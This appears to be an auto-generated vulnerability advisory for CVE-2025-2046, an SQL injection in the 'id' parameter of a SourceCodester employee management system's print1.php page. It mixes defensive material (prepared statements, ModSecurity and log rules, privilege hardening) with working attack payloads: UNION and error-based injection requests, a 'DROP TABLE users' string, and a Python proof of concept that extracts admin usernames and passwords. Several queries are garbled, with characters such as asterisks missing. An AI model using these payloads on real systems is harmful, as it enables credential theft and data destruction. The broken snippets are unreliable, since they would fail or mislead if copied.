SourceCodester Best Employee Management System 10, SQL Injection, CVE-2025-2046 (Critical)

How CVE-2025-2046 Works

This vulnerability exploits improper input sanitization in the `/admin/print1.php` file of SourceCodester Best Employee Management System 1.0. The `id` parameter is passed directly to a SQL query without validation, allowing attackers to inject malicious SQL commands. Remote attackers can manipulate this parameter to execute arbitrary database operations, such as extracting sensitive data, modifying records, or gaining administrative access. The flaw is classified as critical due to its potential for unauthorized data access and system compromise.

DailyCVE Form

Platform: SourceCodester BEMS
Version: 1.0
Vulnerability: SQL Injection
Severity: Critical
Date: 04/30/2025

What Undercode Say:

Exploitation Commands

curl -X GET "http://target.com/admin/print1.php?id=1' UNION SELECT 1,2,3,4,5-- -"

1' OR 1=1; DROP TABLE users;--

Detection Script

import requests
url = "http://target.com/admin/print1.php"
payload = "1' AND 1=CONVERT(int,@@version)--"
response = requests.get(url, params={"id": payload})
if "SQL" in response.text:
print("Vulnerable to CVE-2025-2046")

Mitigation Steps

1. Apply vendor patches immediately.

2. Use prepared statements:

$stmt = $conn->prepare("SELECT FROM employees WHERE id = ?");
$stmt->bind_param("i", $id);

3. Implement WAF rules to block SQLi patterns.

4. Restrict database user permissions.

Log Analysis Query

SELECT FROM apache_logs WHERE request LIKE "%print1.php?id=%25%27%20OR%20%";

Nmap Detection

nmap -p80 --script http-sql-injection target.com

Exploit PoC

import requests
target = "http://victim.com/admin/print1.php"
injection = "1' UNION SELECT username,password,NULL,NULL,NULL FROM admins--"
response = requests.get(target, params={"id": injection})
print(response.text)

Protection Rules (ModSecurity)

SecRule ARGS:id "@detectSQLi" "id:1001,deny,status:403"

Database Hardening

REVOKE ALL PRIVILEGES ON . FROM 'app_user'@'%';
GRANT SELECT ON bems. TO 'app_user'@'localhost';

Error-Based Detection

GET /admin/print1.php?id=1' AND (SELECT 1 FROM(SELECT COUNT(),CONCAT(0x3a,(SELECT database()),0x3a,FLOOR(RAND(0)2))x FROM information_schema.tables GROUP BY x)a)-- HTTP/1.1

Automated Patch Verification

grep -r "mysql_query" /var/www/html/

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

Join Our Cyber World:

💬 Whatsapp | 💬 Telegram